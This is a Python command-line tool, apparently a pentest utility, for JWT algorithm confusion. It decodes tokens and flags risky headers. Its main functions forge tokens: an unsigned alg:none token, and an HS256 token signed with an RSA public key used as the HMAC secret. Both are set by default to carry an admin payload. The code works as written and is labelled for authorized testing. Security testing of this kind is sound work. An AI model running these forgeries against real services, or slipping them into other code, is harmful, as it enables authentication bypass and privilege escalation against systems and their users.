#!/usr/bin/env python3 """Agent for testing JWT algorithm confusion vulnerabilities.""" import argparse import base64 import hashlib import hmac import json from datetime import datetime, timezone def decode_jwt(token): """Decode a JWT token without verification.""" parts = token.split(".") if len(parts) != 3: return None header = json.loads(base64.urlsafe_b64decode(parts[0] + "==")) payload = json.loads(base64.urlsafe_b64decode(parts[1] + "==")) return {"header": header, "payload": payload, "signature": parts[2]} def forge_none_alg(payload_dict): """Create a JWT with alg:none (CVE in some libraries).""" header = base64.urlsafe_b64encode( json.dumps({"alg": "none", "typ": "JWT"}).encode() ).rstrip(b"=").decode() payload = base64.urlsafe_b64encode( json.dumps(payload_dict).encode() ).rstrip(b"=").decode() return f"{header}.{payload}." def forge_hs256_with_public_key(payload_dict, public_key_pem): """Forge JWT by signing with RSA public key as HMAC secret (alg confusion).""" header = base64.urlsafe_b64encode( json.dumps({"alg": "HS256", "typ": "JWT"}).encode() ).rstrip(b"=").decode() payload = base64.urlsafe_b64encode( json.dumps(payload_dict).encode() ).rstrip(b"=").decode() signing_input = f"{header}.{payload}".encode() key_bytes = public_key_pem.encode() if isinstance(public_key_pem, str) else public_key_pem signature = hmac.new(key_bytes, signing_input, hashlib.sha256).digest() sig_b64 = base64.urlsafe_b64encode(signature).rstrip(b"=").decode() return f"{header}.{payload}.{sig_b64}" def analyze_jwt(token): """Analyze a JWT for common vulnerabilities.""" decoded = decode_jwt(token) if not decoded: return {"error": "Invalid JWT format"} findings = [] header = decoded["header"] payload = decoded["payload"] alg = header.get("alg", "") if alg.lower() == "none": findings.append({"issue": "Algorithm set to 'none'", "severity": "CRITICAL"}) if header.get("jku"): findings.append({"issue": f"JKU header present: {header['jku']}", "severity": "HIGH"}) if header.get("x5u"): findings.append({"issue": f"X5U header present: {header['x5u']}", "severity": "HIGH"}) if header.get("kid"): findings.append({"issue": f"KID header: {header['kid']}", "severity": "MEDIUM"}) exp = payload.get("exp") if exp: from datetime import datetime as dt exp_dt = dt.fromtimestamp(exp, tz=timezone.utc) if exp_dt < dt.now(timezone.utc): findings.append({"issue": f"Token expired: {exp_dt.isoformat()}", "severity": "LOW"}) else: findings.append({"issue": "No expiration claim", "severity": "MEDIUM"}) if payload.get("admin") or payload.get("role") in ("admin", "root"): findings.append({"issue": "Admin role in payload", "severity": "INFO"}) return { "header": header, "payload": payload, "algorithm": alg, "findings": findings, } def main(): parser = argparse.ArgumentParser( description="Test JWT algorithm confusion vulnerabilities (authorized testing only)" ) parser.add_argument("--token", help="JWT token to analyze") parser.add_argument("--forge-none", action="store_true", help="Forge alg:none token") parser.add_argument("--forge-hs256", help="Path to RSA public key for alg confusion") parser.add_argument("--payload", help="JSON payload for forged token") parser.add_argument("--output", "-o", help="Output JSON report") args = parser.parse_args() print("[*] JWT Algorithm Confusion Testing Agent") print("[!] For authorized security testing only") report = {"timestamp": datetime.now(timezone.utc).isoformat(), "findings": []} if args.token: analysis = analyze_jwt(args.token) report["findings"].append({"type": "analysis", **analysis}) print(f"[*] Algorithm: {analysis.get('algorithm', 'unknown')}") print(f"[*] Issues: {len(analysis.get('findings', []))}") payload_dict = json.loads(args.payload) if args.payload else {"sub": "admin", "admin": True} if args.forge_none: forged = forge_none_alg(payload_dict) report["findings"].append({"type": "forge_none", "token": forged}) print(f"[*] Forged alg:none token: {forged[:60]}...") if args.forge_hs256: with open(args.forge_hs256, "r") as f: pub_key = f.read() forged = forge_hs256_with_public_key(payload_dict, pub_key) report["findings"].append({"type": "forge_hs256_confusion", "token": forged[:60] + "..."}) print(f"[*] Forged HS256 confusion token generated") if args.output: with open(args.output, "w") as f: json.dump(report, f, indent=2) print(f"[*] Report saved to {args.output}") else: print(json.dumps(report, indent=2)) if __name__ == "__main__": main()